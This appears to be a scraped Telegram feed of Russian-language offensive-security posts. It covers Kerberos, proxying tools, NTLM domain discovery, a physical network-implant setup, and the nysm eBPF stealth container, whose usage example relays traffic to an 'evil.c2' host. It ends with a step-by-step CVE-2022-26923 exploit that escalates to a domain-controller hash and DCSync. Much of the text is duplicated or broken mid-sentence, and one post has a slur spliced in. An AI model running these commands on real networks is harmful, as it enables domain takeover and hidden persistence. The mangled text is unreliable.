Forwarded from Миша
Kerberos UCS.pptx
6.5 MB
Всем привет! Сегодня в УрФУ выступил с докладом на тему Kerberos, разобрали некоторые базовые атаки, принцип работы и основные, самые популярные механизмы, которые встречаются при каждом внутреннем пентесте. В докладе старался не погружаться в уж очень страшные дебри, а рассказать все более-менее простым понятным человеческим языком.
Видео:
https://vk.com/video-210214143_456239047
Презентацию прикрепил во вложениях :)
P.S. Само собой, будет продолжение :)
Видео:
https://vk.com/video-210214143_456239047
Презентацию прикрепил во вложениях :)
P.S. Само собой, будет продолжение :)
🐳2
Forwarded from Offensive Xwitter
Не проксичейнсом едины!
Так-так-так, други. Вангую, вы уже давно искали переносимую альтернативупидорский Golang?.. На удивление, такая альтернатива есть – вот чему сегодня научили коллеги:
🔗 https://github.com/hmgle/graftcp
Выше пример с неработавшим ранее (через проксичейнс) go-windapsearch ⏫
Так-так-так, други. Вангую, вы уже давно искали переносимую альтернативу
proxychains[-ng], да которая бы еще и работала не на LD_PRELOAD-хуках, чтобы уметь редиректить 🔗 https://github.com/hmgle/graftcp
Выше пример с неработавшим ранее (через проксичейнс) go-windapsearch ⏫
🐳1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Если кто хочет потренироваться в обходе различных техник детекта, частично применяемых в EDR, то вот хорошее средство)
https://github.com/Xacone/BestEdrOfTheMarket
#evasion #edr #git #redteam #blueteam
https://github.com/Xacone/BestEdrOfTheMarket
Defensive Techniques ⚔️
* Multi-Levels API Hooking
* SSN Hooking/Crushing
* IAT Hooking
* Shellcode Injection Detection
* Reflective Module Loading Detection
* Call Stack Monitoring
In progress:
* Heap Monitoring
* ROP Mitigation
* AMSI Patching Mitigation
* ETW Patching Mitigation
#evasion #edr #git #redteam #blueteam
GitHub
GitHub - Xacone/BestEdrOfTheMarket: EDR Lab for Experimentation Purposes
EDR Lab for Experimentation Purposes. Contribute to Xacone/BestEdrOfTheMarket development by creating an account on GitHub.
🐳1
Forwarded from APT
⚙️ Determining AD domain name via NTLM Auth
If you have nmap (http-ntlm-info) unable to determine the FQND of an Active Directory domain via OWA, for example due to Citrix NetScaler or other SSO solutions, do it manually!
ntlmdecoder.py
#ntlm #auth #sso #tricks #pentest
If you have nmap (http-ntlm-info) unable to determine the FQND of an Active Directory domain via OWA, for example due to Citrix NetScaler or other SSO solutions, do it manually!
1) curl -Isk -X POST -H 'Authorization: NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAKANc6AAAADw==' -H 'Content-Length: 0' https://autodiscover.exmaple.com/ews
2) echo 'TlRMTVNTUAACAAAADAAMAD...' | python2 ./ntlmdecoder.py
One-Liner function for bashrc\zshrc\etc-rc:ntlm_decode() { curl -Isk -X POST -H 'Authorization: NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAKANc6AAAADw==' -H 'Content-Length: 0' "$1" | awk -F 'NTLM ' '/WWW-Authenticate: NTLM/ {print $2}' | python2 "$(locate ntlmdecoder.py)"; }
Source:ntlmdecoder.py
#ntlm #auth #sso #tricks #pentest
🐳1
Stunner is a tool to test and exploit STUN, TURN and TURN over TCP servers. TURN is a protocol mostly used in videoconferencing and audio chats (WebRTC)
https://github.com/firefart/stunner
https://github.com/firefart/stunner
GitHub
GitHub - firefart/stunner: Stunner is a tool to test and exploit STUN, TURN and TURN over TCP servers.
Stunner is a tool to test and exploit STUN, TURN and TURN over TCP servers. - firefart/stunner
Forwarded from k8s (in)security (r0binak)
Казалось бы, инструмент IceKube – что-то новое и интересное в мире
Тулза умеет искать возможные
Суть работы у
Для тех, кто хочет детальнее изучить инструмент, посмотреть на примеры и ознакомиться с проблематикой – рекомендуем статью "IceKube: Finding complex attack paths in Kubernetes clusters" от авторов тулзы.
Kubernetes Security, но как бы не так.Тулза умеет искать возможные
attack path в кластере от самых минимальных привилегий до cluster-admin. Результаты своей работы отображает в графовой БД – Neo4j. На этом моменте нельзя не упомянуть инструмент, о котором мы рассказывали совсем недавно, и который, очевидно, был взят за основу – KubeHound. Суть работы у
IceKube точно такая же, даже вектора attack path одинаковые и ничего нового авторы не придумали. Но всё-таки отличия у инструментов есть – написаны на разных языках и IceKube имеет пару правил, относящихся к Managed Kubernetes, а именно AKS и AWS. Для тех, кто хочет детальнее изучить инструмент, посмотреть на примеры и ознакомиться с проблематикой – рекомендуем статью "IceKube: Finding complex attack paths in Kubernetes clusters" от авторов тулзы.
Tools for pentest VoIP
sipvicious
viproy-voipkit (Deprecated)
SIPTools
VoIPHopper (Can be pulled from GitHub or installed directly through APT in Kali)
Metasploit modules
/opt/metasploit-framework/embedded/framework/lib/msf/core/auxiliary/mixins.rb:
sipvicious
viproy-voipkit (Deprecated)
SIPTools
VoIPHopper (Can be pulled from GitHub or installed directly through APT in Kali)
Inviteflood (APT Installation)Metasploit modules
/opt/metasploit-framework/embedded/framework/lib/msf/core/auxiliary/mixins.rb:
require 'msf/core/auxiliary/sip'
require 'msf/core/auxiliary/skinny'
require 'msf/core/auxiliary/msrp'
❤1
Полезный ресурс для тренировки анализа кода, поиска уязвимостей и последующего их патча в таких языках и средах, как:
* Golang
* Python
* Solidity
* Kubernetes
* AWS
и т.д
Secdim
Play - SecDim
Learn AppSec & DevSecOps via git-based challenges
Подготовка устройства для проникновения во внутреннюю сеть при физическом пентесте.
Этапы:
1) Для реализации 1-го шага можно взять пример из репозитория, который содержит в себе инструкцию по развертыванию open vpn в docker'е.
2) Способы автоматической инициализации подключения к vpn серверу при запуске устройства:
* systemd unit (Пример подходящего юнита можно найти в том же репозитории)
* docker container
3) Ssh socks proxy
Также в самой впн сети можно пробросить маршруты от клиента, до внутренней сети.
Для этого наше устройство нужно настроить для маршрутизации трафика.
Добавить статический маршрут до внутренней сети.
Если мы хотим получить доступ до внутренней сети, будучи таким же vpn клиентом, а не хостом, то статические маршруты нужно добавить на клиент и на хост
Этапы:
* Деплой внешнего впн сервера
* Настройка самого физ устройства (я использовал orange pi)
* Выбор удобного варианта проксирования во внутреннюю сеть
1) Для реализации 1-го шага можно взять пример из репозитория, который содержит в себе инструкцию по развертыванию open vpn в docker'е.
2) Способы автоматической инициализации подключения к vpn серверу при запуске устройства:
* systemd unit (Пример подходящего юнита можно найти в том же репозитории)
* docker container
docker run -it --cap_add=NET_ADMIN --name vpn --restart always --net host -v (директория с впн конфигом):/vpn -d dperson/openvpn-client
3) Ssh socks proxy
ssh -D 8888 user@remoteserver
Также в самой впн сети можно пробросить маршруты от клиента, до внутренней сети.
Для этого наше устройство нужно настроить для маршрутизации трафика.
sudo sysctl -w net.ipv4.ip_forward=1
sudo iptables -A FORWARD -i <vpn интерфейс> -o <внутренний интерфейс> -j ACCEPT
sudo iptables -A FORWARD -i <внутренний интерфейс> -o <vpn интерфейс> -m state --state ESTABLISHED,RELATED -j ACCEPT
sudo iptables -t nat -A POSTROUTING -o <vpn интерфейс> -j MASQUERADE
Добавить статический маршрут до внутренней сети.
ip route add {NETWORK/MASK} via {GATEWAYIP}🐳1
Forwarded from Похек (Sergey Zybnev)
This media is not supported in your browser
VIEW IN TELEGRAM
🔴 nysm
Скрытый контейнер для постэксплуатации.
#eBPF #offensive
С ростом популярности offensive инструментов, основанных на eBPF, начиная от кражи учетных данных и заканчивая руткитами, скрывающими свой собственный PID, авторам пришел в голову вопрос: Можно ли сделать eBPF невидимым в глазах админа? В результате они создали nysm, eBPF stealth контейнер, предназначенный для того, чтобы сделать инструменты атакующих незаметными для системных администраторов, не только скрывая eBPF, но и многое другое:
- bpftool
- bpflist-bpfcc
- ps
- top
- sockstat
- ss
- rkhunter
- chkrootkit
- lsof
- auditd
- и другое
Как это работает?
Установка:
Использование:
👉 https://github.com/eeriedusk/nysm
🌚 @poxek
Скрытый контейнер для постэксплуатации.
#eBPF #offensive
С ростом популярности offensive инструментов, основанных на eBPF, начиная от кражи учетных данных и заканчивая руткитами, скрывающими свой собственный PID, авторам пришел в голову вопрос: Можно ли сделать eBPF невидимым в глазах админа? В результате они создали nysm, eBPF stealth контейнер, предназначенный для того, чтобы сделать инструменты атакующих незаметными для системных администраторов, не только скрывая eBPF, но и многое другое:
- bpftool
- bpflist-bpfcc
- ps
- top
- sockstat
- ss
- rkhunter
- chkrootkit
- lsof
- auditd
- и другое
Как это работает?
Поскольку eBPF не может перезаписывать возвращаемые значения или адреса ядра, наша цель - найти вызов самого низкого уровня, взаимодействующий с адресом пользовательского пространства, чтобы перезаписать его значение и скрыть нужные объекты. Чтобы отличить события nysm от других, все выполняется в отдельном пространстве имен PID.
Установка:
sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y; git clone https://github.com/eeriedusk/nysm; cd nysm; bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h; make
Использование:
Usage: nysm [OPTION...] COMMAND
Stealth eBPF container.
-d, --detach Run COMMAND in background
-r, --rm Self destruct after execution
-v, --verbose Produce verbose output
-h, --help Display this help
--usage Display a short usage message
# Примеры
./nysm bash
./nysm -r ssh user@domain
./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Purple Chronicles (ELK Enjoyer)
Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)🖼️
Кратко поговорим об интересной уязвимости, которая позволяет нам повысить привилегии в домене.
Требования:
1. Доменная учетная запись;
2. Возможность добавлять компьютер в домен;
3. Наличие стандартного шаблона сертификата Machine;
4. Возможность изменять атрибуты учётной записи компьютера (будет по умолчанию после добавления компьютера в домен, так как мы будем владельцем объекта).
🐍 Для эксплуатации используем утилиту Certipy, краткая справка по ней представлена ниже:
Далее заходим на любой хост домена и начинаем менять SPN у записи нашего компьютера:
Возвращаемся на атакующий хост и запрашиваем новый сертификат:
Авторизуемся с полченным сертификатом и получаем NTLM хэш учетной записи контроллера домена:
Далее осуществляем атаку DCSync любым удобным для нас способом и захватываем домен:
Вектор будет работать только в уязвимой к CVE-2022-26923 среде Active Directory, но если вы в ней оказались, то повысить привилегии будет так же просто, как, например, в случае с эксплуатацией ZeroLogon!🔺
#пентест #AD
Кратко поговорим об интересной уязвимости, которая позволяет нам повысить привилегии в домене.
Требования:
1. Доменная учетная запись;
2. Возможность добавлять компьютер в домен;
3. Наличие стандартного шаблона сертификата Machine;
4. Возможность изменять атрибуты учётной записи компьютера (будет по умолчанию после добавления компьютера в домен, так как мы будем владельцем объекта).
# УстановкаНачнем атаку с добавления компьютера в домен при помощи Impacket-Addcomputer
pip install certipy-ad
# Запрос сертификата
# для certipy-ad v3.0.0:
certipy req 'domain.local/username:password@dc.domain.local' -ca 'CA NAME' -template TemplateName
# для certipy-ad v4.8.2:
certipy req -u username@domain.local -p password -ca 'CA NAME' -template User -upn thm@domain.local -dc-ip 10.10.10.10
# Авторизация с сертификатом для извлечения NTLM-хэша:
certipy auth -pfx username.pfx -dc-ip 10.10.10.10
addcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'Запрашиваем сертификат для учётной записи компьютера (шаблон Machine) и авторизуемся с ним:
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine
certipy auth -pfx testpc.pfx
Далее заходим на любой хост домена и начинаем менять SPN у записи нашего компьютера:
Get-ADComputer TESTPC -properties dnshostname,serviceprincipalname
Set-ADComputer TESTPC -DnsHostName DC.domain.local # вернёт ошибку из-за дублирующейся SPN
Set-ADComputer TESTPC -ServicePrincipalName @{} # обнуляем SPN
Set-ADComputer TESTPC -DnsHostName DC.domain.local
Возвращаемся на атакующий хост и запрашиваем новый сертификат:
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine
Авторизуемся с полченным сертификатом и получаем NTLM хэш учетной записи контроллера домена:
certipy auth -pfx dc.pfx
...
[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733
Далее осуществляем атаку DCSync любым удобным для нас способом и захватываем домен:
secretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt
Вектор будет работать только в уязвимой к CVE-2022-26923 среде Active Directory, но если вы в ней оказались, то повысить привилегии будет так же просто, как, например, в случае с эксплуатацией ZeroLogon!
#пентест #AD
Please open Telegram to view this post
VIEW IN TELEGRAM